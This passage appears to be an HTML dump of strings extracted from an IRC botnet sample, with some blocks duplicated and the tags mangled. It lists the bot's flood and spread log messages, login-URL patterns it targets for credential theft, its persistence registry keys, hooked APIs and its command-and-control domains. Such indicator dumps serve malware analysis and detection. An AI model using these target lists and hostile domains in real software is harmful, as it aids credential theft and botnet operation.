%s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\Explorer.EXE</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" 
%S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\explorer.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>wmiprvse.exe_3704_rwx_00D80000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s 
(p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><p
re>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d 
KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" 
s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\wbem\wmiprvse.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" 
%S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7></pre></7>